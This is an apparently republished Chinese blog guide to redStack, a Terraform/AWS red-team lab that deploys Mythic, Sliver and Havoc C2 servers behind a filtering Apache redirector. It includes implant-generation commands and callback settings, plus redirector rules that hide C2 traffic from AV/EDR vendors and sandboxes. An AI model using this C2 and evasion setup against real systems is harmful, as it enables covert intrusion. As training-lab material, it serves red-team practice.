文章总结： redStack是基于Terraform和AWS的红队基础设施自动化项目，解决实验室搭建繁琐痛点。它集成Mythic、Sliver、Havoc三大C2框架，通过双VPC架构与Apache重定向器构建生产级安全环境。文档详述了部署流程、安全过滤验证及连接外部靶场的方案。该工具帮助安全人员跳过基建阶段，直接投入高级攻防战术演练，提升实战效率。 综合评分： 93 文章分类： 安全工具,红队,实战经验,内网渗透

redStack：一键搭建的实战红队实验室

原创

工具党 工具党

幻泉之洲

2026年3月10日 19:18 北京

想亲手搭建一个专业级红队基础设施却苦于复杂的配置和资源整合？redStack 来了。这个基于 Terraform 和 AWS 的项目，能让你在 30 分钟内获得一个从“开机到破防”的完整红队环境。它集成了 Mythic、Sliver、Havoc 三个主流 C2 框架、带安全过滤的 Apache 重定向器、集中访问的 Guacamole 网关，以及一个预装了工具的 Windows 操作站。本文就是这份详细的中文搭建指南。

01 工具速览

redStack 是一个高度自动化的“基础设施即代码”项目。你不用关心服务器怎么配、网络怎么通、代理怎么搭。

它的目标是：让使用者能立即投身于高级 C2 战术的演练，而不是浪费时间去配置实验室。

官方已经宣告，redStack 现在功能完备，支持既需要公网域名、又想连接 HackTheBox、VulnLabs 这类封闭 VPN 环境的两种模式。

一句话说明白：你运行几个 Terraform 命令，它就自动在 AWS 上给你创建好包含 6 台服务器的完整网络架构，全都按生产环境的最佳实践配置好。

请注意，redStack 不是教你如何使用 C2 框架的教程。它负责清除搭建基础设施的障碍，让你能专注在学习上。你能得到一个已配置好的、生产风格的红队环境，剩下的，你自己看着办。

默认网络架构：

• C2服务器端VPC

  ：内部 IP 段 172.31.0.0/16。包含 Mythic、Sliver、Havoc 三个 C2 服务器，以及 Guacamole 网关和 Windows 操作站。

• 重定向器VPC

  ：内部 IP 段 10.60.0.0/16。仅包含 Apache 重定向器服务器。

• 关键设计

  ：所有 C2 服务器均无公网 IP，只能通过 VPC 对等连接，由重定向器进行代理访问。

安全设计核心：重定向器会验证特定的 HTTP 头部（X-Request-ID）和 URI 前缀。只有匹配的请求才会被代理到后端的 C2 服务器，否则将返回一个伪装成 CDN 维护页面的诱饵页面。

02 部署前的准备工作

在开始部署之前，请确保你的手边有这些东西。

• AWS 账户：需要有效的 IAM 凭证（访问密钥 ID 和秘密访问密钥）。
• AWS 命令行界面：已安装并完成基础配置。
• Terraform：版本需 ≥ 1.0。
• 你的公网 IP 地址。

基础配置快速流程

安装并配置 AWS CLI。配置过程中会要求你输入密钥和选择区域。

aws configure

接着，安装 Terraform。不同平台方法略有不同。

macOS

brew install terraform

Windows

choco install terraform

之后，必须手动在 AWS 上创建一个 SSH 密钥对。Terraform 可不会替你做这个。

aws ec2 create-key-pair –key-name rs-rsa-key –query ‘KeyMaterial’ –output text > ./rs-rsa-key.pem chmod 400 ./rs-rsa-key.pem

最后，验证一下。运行下面的命令，确认 AWS、Terraform 都已就绪，并记下你的公网 IP。

aws sts get-caller-identity terraform –version curl -s ifconfig.me

03 部署与配置全流程

3.1 初始化与部署基础设施

进入项目目录，复制变量文件模板。

cp terraform.tfvars.example terraform.tfvars

编辑 terraform.tfvars 文件，这是部署的核心配置文件。以下部分是必须修改的。

localPub_ip          = “你的公网IP/32” ssh_key_name         = “rs-rsa-key” ssh_private_key_path = “./rs-rsa-key.pem”

接下来是针对环境模式的选择：

1. 公开环境（默认）

   ：你需要一个域名。设置 redirector_domain = "c2.你的域名.后缀"。启用重定向器安全检查。

2. 封闭环境（如 HTB Pro Lab）

   ：留空域名，并设置以下两个变量。

   enable_external_vpn                  = true enable_redirector_htaccess_filtering = false

其他如实例类型、C2 回连 URI 前缀等，可以根据你需要修改。

配置完成后，开始部署三部曲。

terraform init terraform plan  # 检查将要创建的资源 terraform apply # 执行部署，输入 yes 确认

整个过程大约 5-10 分钟。Terraform 会创建 VPC、安全组、EC2 实例等总共 50 多个资源。

AWS 成本警告

：部署的 EC2 实例无论你是否使用都会持续产生费用。实验室不用时，请执行 terraform destroy 彻底销毁资源，否则账单可能让你“惊喜”。

部署完成后，立即保存输出信息。

terraform output deployment_info terraform output network_architecture

deployment_info 里面包含所有服务器的 IP、密码、SSH 命令和关键的 C2 头部验证令牌，务必存好。

如果你的部署模式是公开环境，现在需要去你的域名 DNS 服务商那里，将为你的域名创建一个 A 记录，指向 deployment_info 中显示的 Apache 重定向器的公网 IP。

3.2 验证环境是否可用

部署的启动脚本正在疯狂安装软件，给点耐心。完成后，通过 Guacamole 这个 Web 网关来访问一切。

在浏览器中打开：https://[guacamole的公网IP]/guacamole。 使用 deployment_info 中提供的 guacadmin 账号和密码登录。

登录后，你应该能看到 7 个预配置好的连接，包括：

• Windows 操作站（RDP）
• Mythic、Sliver、Havoc 三个 C2 服务器（SSH）
• Apache 重定向器（SSH）
• Guacamole 服务器本身（SSH）
• Havoc 的图形界面桌面版（VNC）

点击 “Windows Operator Workstation” 通过 RDP 连上 Windows 桌面，打开 MobaXterm，就能看到已经配置好的 SSH 会话，可以免密码连接所有内部服务器。

3.3 配置核心：Apache 重定向器

重定向器是你的 C2 框架的“门面”和安全屏障，必须配置好。

对于公开环境，你需要为它获取一个 SSL 证书。通过 Guacamole SSH 连接到重定向器，然后运行。

sudo certbot –apache -d 你的域名

Certbot 会自动完成申请、验证和配置。如果是封闭环境，这一步可以跳过。

系统预装了一个脚本，可以一键测试重定向器的各项功能。

sudo /home/admin/test_redirector.sh

这个脚本会告诉你：

• Apache 是否在运行
• 是否成功连接到后端的 C2 服务器
• 有无有效头部时，是返回诱饵页面还是尝试代理
• 各个不同的 URI 前缀是否正确路由到对应的 C2 后端

三重安全机制：

1. 扫描器/杀软屏蔽

   ：通过 redirect.rules 文件，自动阻止已知的 AV/EDR厂商、云沙箱 IP 和 TOR 出口节点的访问。

   检查规则文件是否有生效

   grep -c ‘RewriteCond’ /etc/apache2/redirect.rules

2. 头部验证

   ：请求必须包含正确的 X-Request-ID 头部及令牌值。令牌值从 deployment_info 中获取。

3. URI 前缀路由

   ：只有匹配特定前缀（如 /cdn/media/stream/ forMythic）的请求才会被转发。

04 C2 框架快速上手验证

4.1 Mythic C2 验证

目标：生成一个 Windows 木马，让它成功回连，证明环境可用。

在 Windows 工作站浏览器中打开 https://mythic:7443，使用 deployment_info 中的密码登录。

1. 创建新有效载荷，操作系统选 Windows，代理选 apollo。

2. 选择 C2 配置档时，选用 http 配置，并按如下填写：

   | 字段 | 值 | | — | — | | callback_host | 你的域名 或 重定向器公网 IP | | callback_port | 443 | | headers | 新增一行：X-Request-ID: [你的令牌] | | post_uri | cdn/media/stream/update |

3. 生成并下载 .exe 文件。

4. 在 Windows 工作站上运行此 .exe。几秒后，在 Mythic UI 的 “Active Callbacks” 页面应该就能看到新的会话。

4.2 Sliver C2 验证

通过 Guacamole 连接到 Sliver 服务器。进入 Sliver 控制台。

sliver-client

导入项目预先生成的配置档（每轮部署只需做一次）。

c2profiles import –file /home/admin/redstack-c2-profile.json —name redstack

启动 HTTP 监听器。

http –lhost 0.0.0.0 –lport 80

生成植入程序。

generate –http https://[你的域名]/cloud/storage/objects/ –os windows –arch amd64 –format exe –c2profile redstack –save /tmp/sliver.exe

将文件传输到 Windows 工作站并执行，就能在 sessions 命令中看到新会话。

4.3 Havoc C2 验证

Havoc 稍微特殊，第一次部署后需要手动编译。通过 Guacamole SSH 到 Havoc 服务器并运行。

~/build_havoc.sh

编译需要 15-25 分钟。完成后，通过 Guacamole 的 “Havoc C2 Desktop (VNC)” 连接，启动其图形化客户端。

• 在客户端中创建监听器：

• Payload: Http

• Hosts: 你的域名 或 重定向器公网 IP

• Uris: /edge/cache/assets/update

• Headers: X-Request-ID: [你的令牌]

• 生成 Demon 植入体，传至 Windows 并运行。

至此，三个 C2 框架都应可正常工作。再次运行重定向器的测试脚本，确认三个后端连通性都是 OK。

05 特殊情况：连接外部靶场 (HTB/VL/PG)

如果你的红队练习是在 HackTheBox 或 Proving Grounds 这类需要通过 OpenVPN 连接的封闭网络中进行，redStack 也支持。

核心挑战：AWS VPC 对等连接有个限制——它只会转发目标 IP 属于任一 VPC 网段的数据包。靶场机器（如 10.10.10.2）的 IP 不属于这两个网段，所以包会被丢弃。

解决方案：在 Guacamole 服务器和重定向器之间创建一个 WireGuard 隧道。这样，去往靶场的流量被封装成 WireGuard 数据包，而它的目标地址是重定向器的 VPC IP（10.60.x.x），这就能通过 VPC 对等连接了。抵达重定向器后，再解封装，通过 OpenVPN 发往靶场 VPN。

配置步骤：

1. 在 terraform.tfvars 中设置：

   enable_external_vpn                  = true enable_redirector_htaccess_filtering = false

2. 使用 terraform apply 重新部署（可能需要先 destroy 旧的）。

3. 部署完成后，将你的靶场平台提供的 .ovpn 文件上传到重定向器的 ~/vpn/ 目录。

4. 在重定向器上启动 VPN 服务。

   sudo systemctl start ext-vpn

5. 配置 C2 监听器时，回连地址需改为重定向器从 VPN 获得的 tun0 接口 IP（使用 HTTP 协议）。

现在，你的 redStack 实验室中的所有机器都能访问靶场网络了。

06 结语：它解决的是什么问题？

说真的，搭一个红队实验室最麻烦的是什么？不是单点的工具，而是整个体系的整合和“怎么让它们在一起工作”。服务器安全怎么配、网络怎么通、C2 流量如何隐蔽、不同框架怎么部署……这些重复又易错的步骤，占用了你绝大多数的时间。

redStack 把这些都打包了，用代码定义好了生产级的配置。你只要运行它，就能得到一个“开箱即战”的环境。你的学习曲线，直接从“搞基建”跳到了“练战术”。

它的价值就在于，帮你省下那几十个小时的搭建和排错时间。你可以立刻上手，用上三个最热门的 C2 框架，在一个仿真的安全环境中，练习从初始访问、植入、横移到数据渗透的全套动作。

工具就在这里。环境已经就绪。现在，是时候开始你的“破防”演练了。

获取方式：回复“redStack”获取

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：幻泉之洲 工具党 工具党《redStack：一键搭建的实战红队实验室》